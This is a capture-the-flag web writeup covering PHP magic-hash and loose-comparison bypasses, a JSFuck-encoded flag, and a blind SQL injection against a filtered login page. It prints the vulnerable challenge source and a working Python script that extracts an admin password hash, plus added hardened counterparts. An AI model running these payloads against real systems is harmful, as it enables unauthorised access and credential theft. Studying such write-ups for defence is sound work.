0x01 Preface
In this competition I only solved three of the web challenges, which shows how much of a noob I am.
0x02 Web sign-in: PHP weak typing
Looking at the source, the username must consist of letters and the password of digits. The login check can be bypassed with strings whose MD5 hash begins with 0e; here is a list of such strings:
<?php
var_dump(md5('240610708') == md5('QNKCDZO')); // bool(true)
var_dump(md5('aabg7XSs') == md5('aabC9RqS')); // bool(true)
var_dump(sha1('aaroZmOk') == sha1('aaK1STfY')); // bool(true)
var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m')); // bool(true)
var_dump('0010e2' == '1e3');       // bool(true)
var_dump('0x1234Ab' == '1193131'); // bool(true) on PHP 5 only; PHP 7 no longer treats hex strings as numeric
var_dump('0xABCdef' == '0xABCdef'); // bool(true)
?>
This exploits PHP's loose comparison. When two MD5 values that both begin with 0e are compared with ==, PHP sees two numeric strings in scientific notation (0 times 10 to some power), converts both to numbers, and 0 equals 0, so the check is bypassed.
The second part is a code audit, and again it is PHP loose comparison: the request body is parsed with json_decode, the value of the key field is compared with $key, and the flag is returned if they match.
When PHP compares a number with a string, it converts the string to a number before comparing them.
<?php
var_dump("admin" == 0); // bool(true)
var_dump("0e123" == 0); // bool(true)
var_dump("4test" == 4); // bool(true)
// Under PHP 8 the first and third comparisons are false: a non-numeric string is no longer cast to a number.
?>
So our PoC is message={"key": 0}, which returns the flag.
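The two checks above, as an added example that is not part of the original writeup: each loose comparison beside a version that is not bypassable by 0e hashes or a JSON integer. It assumes PHP 7 loose-comparison rules, which the challenge relied on; the stored hash and secret key are constructed samples.

```php
<?php
// Added example (not the challenge's code): the sign-in checks as the challenge
// effectively implements them, beside hardened versions.
// Assumes PHP 7.x loose-comparison rules (PHP 8 changed number-vs-string ==).

// Constructed sample credential: md5('QNKCDZO') is one of the 0e... "magic" hashes.
$storedPasswordHash = md5('QNKCDZO');
$secretKey          = 'constructed-secret-key';

function weakPasswordCheck(string $candidate, string $storedHash): bool {
    // Vulnerable: if both hashes look like "0e<digits>", == compares them as 0.0 == 0.0.
    return md5($candidate) == $storedHash;
}

function strictPasswordCheck(string $candidate, string $storedHash): bool {
    // hash_equals() compares byte by byte in constant time and never coerces types.
    return hash_equals($storedHash, md5($candidate));
}

function weakKeyCheck(string $json, string $secretKey): bool {
    $data = json_decode($json, true);
    // Vulnerable: a JSON integer 0 loosely equals any non-numeric string under PHP 7.
    return isset($data['key']) && $data['key'] == $secretKey;
}

function strictKeyCheck(string $json, string $secretKey): bool {
    $data = json_decode($json, true);
    // Reject anything that is not a string before comparing, then compare strictly.
    return is_array($data)
        && isset($data['key'])
        && is_string($data['key'])
        && hash_equals($secretKey, $data['key']);
}

// The writeup's bypass input against both password checks:
var_dump(weakPasswordCheck('240610708', $storedPasswordHash));
var_dump(strictPasswordCheck('240610708', $storedPasswordHash));
var_dump(strictPasswordCheck('QNKCDZO', $storedPasswordHash));

// The writeup's PoC body against both key checks, then a legitimate key:
var_dump(weakKeyCheck('{"key": 0}', $secretKey));
var_dump(strictKeyCheck('{"key": 0}', $secretKey));
var_dump(strictKeyCheck('{"key": "constructed-secret-key"}', $secretKey));
```

Only the weak variants accept the bypass inputs; the strict variants accept nothing but the exact stored value.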
0X03 Web Draw
In http://117.34.111.15/js/jQuery.js there is a string of JSFuck-encoded code; decoding it gives the flag. Two recommended JSFuck sites:
www.jsfuck.com
https://enkhee-osiris.github.io/Decoder-JSFuck
0x04 Web Soeasy
<?php

include("config.php");

$conn->query("set names utf8");

function randstr($lenth = 32) {
    $strBase = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM";
    $str = "";
    while ($lenth > 0) {
        $str .= substr($strBase, rand(0, strlen($strBase) - 1), 1);
        $lenth--;
    }
    return $str;
}

if ($install) {
    // varchar lengths were garbled in the extracted source; 32 is assumed (an md5 hex digest is 32 chars)
    $sql = "CREATE TABLE `user` (
        `id` int(10) unsigned NOT NULL PRIMARY KEY AUTO_INCREMENT,
        `username` varchar(32) NOT NULL,
        `passwd` varchar(32) NOT NULL,
        `role` varchar(32) NOT NULL
    ) ENGINE=MyISAM AUTO_INCREMENT=1 DEFAULT CHARSET=latin1 COLLATE=latin1_general_ci";
    if ($conn->query($sql)) {
        $sql = "INSERT INTO `user` (`username`, `passwd`, `role`) VALUES ('admin', '" . md5(randstr()) . "', 'admin')";
        $conn->query($sql);
    }
}

function filter($str) {
    // keyword/character blacklist; whitespace variants are appended via urldecode()
    $filter = "/\*|#|;|,|is|union|like|regexp|for|and|or|file|--|\||`|&| |"
        . urldecode('%09') . "|" . urldecode('%0a') . "|" . urldecode('%0b') . "|"
        . urldecode('%0c') . "|" . urldecode('%0d') . "|" . urldecode('%a0') . "/i";
    if (preg_match($filter, $str)) {
        die("You can't input this illegal char!");
    }
    return $str;
}

function show($username) {
    global $conn;
    // $username is concatenated into the query unescaped: this is the injection point
    $sql = "select role from `user` where username = '" . $username . "'";
    $res = $conn->query($sql);
    if ($res->num_rows > 0) {
        echo "$username is " . $res->fetch_assoc()['role'];
    } else {
        die("Don't has this user!");
    }
}

function login($username, $passwd) {
    global $conn;
    global $flag;

    $username = trim(strtolower($username));
    $passwd = trim(strtolower($passwd));
    if ($username == 'admin') {
        die("You can't login this as admin!");
    }

    $sql = "SELECT * from `user` where username='" . $conn->escape_string($username)
        . "' and passwd='" . $conn->escape_string($passwd) . "'";
    $res = $conn->query($sql);
    if ($res->num_rows > 0) {
        if ($res->fetch_assoc()['role'] === 'admin') exit($flag);
    } else {
        echo "Sorry,username or passwd error!";
    }
}

function source() {
    highlight_file(__FILE__);
}

$username = isset($_POST['username']) ? filter($_POST['username']) : "";
$passwd = isset($_POST['passwd']) ? filter($_POST['passwd']) : "";

$action = isset($_GET['action']) ? filter($_GET['action']) : "source";

switch ($action) {
    case "source": source(); break;
    case "login": login($username, $passwd); break;
    case "show": show($username); break;
}
The action parameter has three modes: source, login and show. source highlights the source code, login performs a login, and show looks up whether a username exists.
From the source we know the username is admin and the password is the MD5 of a randomly generated 32-character string, so brute-forcing the password through login is clearly not feasible, and login refuses admin outright. For that, refer to P牛's article: a trailing %C2 can bypass the admin check.
Back to the point: the username field feeds a $sql statement that can be injected. It is a blind injection, and the following are filtered:
*  ;  ,  is  union  like  regexp  for  and  or  file  --  |  `  &  space
This challenge is a bit like a SWUP-CTF challenge.
Parentheses can replace spaces, and we use the form select*from xx where xx='0'='1'='0', putting our condition in place of the '1'.
Here is the PoC:
# coding=utf-8
import requests

url = 'http://117.34.111.15:89/index.php?action=show'
alphabet = 'abcdef0123456789'   # hex digits of an md5 digest
flag = ""
# recover the 32-char hash from its last character backwards: position 33-length is the suffix start
for length in range(1, 33):
    for x in alphabet:
        s = requests.session()
        payload = {"username": "username'=(select(1)from(user)where(mid((passwd)from(%d))='%s%s'))='" % (33 - length, x, flag)}
        # the query matches every row (including admin) only when the guessed suffix is right
        if 'admin' in s.post(url, data=payload).text:
            flag = x + flag
            print(33 - length, flag)
Eventually the MD5 value of the password is dumped in full.
For the principle behind the %C2 login bypass, see P牛's article "MySQL character encoding utilization tips".
Finally, get the flag.
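For contrast, an added example that is not the challenge's own code: the show() lookup rewritten with an allowlist and a prepared statement, which closes both the blind injection and the trailing-byte trick described above. It assumes the challenge's `user` table (username, passwd, role) and a mysqli connection; the connection credentials are constructed placeholders.

```php
<?php
// Added example, not the challenge's code: hardened show() lookup.
// Assumes the challenge's `user` table and a mysqli connection.

function connectDb(): mysqli {
    // Constructed placeholder credentials; the challenge's config.php is not shown.
    $conn = new mysqli('localhost', 'db_user', 'db_pass', 'db_name');
    // Declare the charset through the API instead of a raw "set names" query, so the
    // client library and escape_string() agree on which encoding is in use.
    $conn->set_charset('utf8mb4');
    return $conn;
}

function validUsername(string $username): bool {
    // Allowlist instead of the challenge's keyword blacklist: 1-32 ASCII letters,
    // digits or underscores. This also rejects the stray 0xC2 byte aimed at the
    // admin check, and the quotes, parentheses and '=' used in the injection.
    return preg_match('/\A[A-Za-z0-9_]{1,32}\z/', $username) === 1;
}

function showUser(mysqli $conn, string $username): string {
    if (!validUsername($username)) {
        throw new InvalidArgumentException('invalid username');
    }
    // Prepared statement: the value reaches the server as data, never as SQL text,
    // so the 'x'=(subquery)='' chaining in the writeup has nothing to rewrite.
    $stmt = $conn->prepare('SELECT role FROM `user` WHERE username = ?');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $conn->error);
    }
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $stmt->bind_result($role);
    $found = $stmt->fetch();   // true for a row, null when there is none
    $stmt->close();
    if ($found !== true) {
        throw new RuntimeException("Don't has this user!");
    }
    return $username . ' is ' . $role;
}

// Usage mirroring the challenge's action=show handler:
// $conn = connectDb();
// echo showUser($conn, $_POST['username'] ?? '');
```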
Cstc-web-writeup